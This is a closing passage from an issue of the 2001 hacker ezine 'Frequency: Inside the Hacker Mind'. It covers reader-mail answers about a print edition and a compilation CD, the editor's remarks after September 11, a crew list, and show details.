crew? REPLY> Never let it be said that Hackermind/Frequency fans don't want to help out. We would first like to thank everyone who's written and asked to assist us with either the show, site, or ezine. Your dedication is greatly appreciated. However, at this time we have no desire to bring in new members to our crew. Dozens of you have offered your services as full time writers, but the honest truth is that full-timers are not needed. When we first asked for writers to join our crew it was because so few articles were being sent in that we needed any help we could get. Thankfully people like The Blue Giant and DamienAK came to our rescue. But even with DamienAK's departure from the ezine, permanent writers are not needed. The key word being "permanent." We encourage everyone to send in their articles, and we know there are a lot of you out there. Wouldn't you like the chance to tell the world your side of the story? Others have asked to help with the show, file storage, or with being a webmaster. Again, we thank you for your interest but assure you we have it all under control. Ø What's this "Frequency: Special Edition" you mentioned on your message board all about? REPLY> After receiving several requests for actual hard copies of the ezine we decided to ask our readers how they felt about the idea. The ezine will always be free, but as you know ink and paper are not. For that reason, we'll have to charge around the price of a regular magazine for the Special Edition. To clarify, anyone who does NOT purchase the Special Edition will still be able to download the ezine free of charge from Hackermind.net. The Special Edition will simply be a hardcover edition of whichever issue we decide to use, with some added bonuses for those who decide to shell out the money. Special features may include artwork, interviews, and reader mail among other things. Aside from those, the magazine will also have graphics and other special treats to bring it to life. If you would be interested in this, or if you think it's a bad idea, please email us at screamer@hackermind.net or leave a message on our board. Ø What's the "Hackermind CD?" REPLY> The Hackermind CD (working title) will be a compilation of songs heard on either the Hackermind stream or during the actual show. The first CD will have around 13 tracks and feature songs like Linkin Park's "One Step Closer," Class of 99's "Another Brick in the Wall," and of course the complete version of "Cowgirl" by Underworld, also known as the Hackermind theme. As of now we plan on having small contests, with the winners receiving an autographed copy of the CD. The first contest of course is the Hackermind Message of the Moment password crack. The first person to dial 1-800-555-8355, say "Announcements", enter 1204870 and crack the password to our message will receive the CD…if of course they email us and prove it was them by reading back our password. Other contests will follow, but some of you have mentioned you would like to purchase a copy. If demand is great enough we'll consider it, but we'd like to keep this as non-commercial as possible. Ø Who publishes your ezine? [Cyrus D. Riddlah] REPLY> "Frequency: Inside the Hacker Mind" is a self published ezine. We like to refer to ourselves as Hackermind Productions when asked, but all in all it's still just us. 12. CLOSING ARGUMENTS This month was supposed to be one of celebrating the joy of Halloween. The fun of scaring little kids by dressing up like Michael Myers and watching them in horror is something I fondly remember from years back (*ahem* 3 years ago). But due to the sudden, and quite unsuspected tragedy that befell our country, writing this closing argument has taken on a new tone. If this is the section where I write what I, and hopefully you, have learned throughout the issue I suppose there's only one thing I can think of. No matter how hard the USA is struck by the evils of terrorists we move on and continue in our way of life. This issue dedicated a cover to those that were lost in the horrible events of September 11, 2001 but the content of the issue was unchanged. This will hopefully show that we need to remember, and yet get on with things at the same time. And with that, our hearts go out to those lost in the tragedy. I would like to mention in these closing arguments that we still need your articles! We receive some from dedicated writers every month, but we know there are more of you out there that we have yet to hear from. Please don't be intimidated, or shy for that matter. We welcome all kinds of articles, whether they're editorials or other forms of expression (i.e.: technical how-to's). There was a time when Frequency stayed away from providing information, but times have changed. To avoid appearing too much like every other ezine out there we decided long ago to be committed to expressing the views of people in the hacker world, be they technological or political. Later we saw that information was a form of expression, and to deny hackers the chance to educate each other would be to cut off a very important part of the "hacker mind." So please, send your articles into articles@hackermind.net. For those of you unsure of what to write, we will be providing some pointers and suggestions in next month's issue on how to get your articles published. Well that's just about it folks, Freq14 has come and gone. But remember, we need your feedback on the "Frequency: Special Edition" idea we've been throwing around. For more information, visit www.hackermind.net and head over to the Frequency section of our message board. Tell us what you like and don't like about the idea, as well as whether or not you would be interested. Alright, that's it for now, see you in November and Happy Halloween! -screamer 13. CREW Screamer Chaotix - Editor in Chief Dash "Danger" Interrupt - Webmaster Da Peng - Network Administrator The Blue Giant - Writer Contributing Writers: w0rm, fusys, killall(), Sad is Tic, Incogl33to, Argonaut Shout Outs: NYPD and FDNY, the victims of Tuesday's atrocious tragedy, Buzzy, Dunceor for staying up till 4am, WSIN, Paul Partain, and of course DamienAK - we'll miss ya. Send article/cover submissions to articles@hackermind.net along with the name you wish to be recognized by as well as a title for your work. Tune into Hackermind, Thursdays at 10PM Eastern (0200 UTC) by opening location 166.90.148.114:9474 with Winamp or Real Player. "I'm not going to launch a 2 million dollar missile into a 10 dollar empty tent just to hit a camel in the butt." -George W. Bush Explaining the logic of firing missiles at meaningless targets. "I have eight classes each and every week, this week I managed to sit through 2 of them." -Screamer Chaotix What more could you ask for? "What have you been smoking?" -Unreal Apparently asking him to be live on the show was met with some hesitation WWW.HACKERMIND.NET Screamer and Dash Will Return in "Freq15"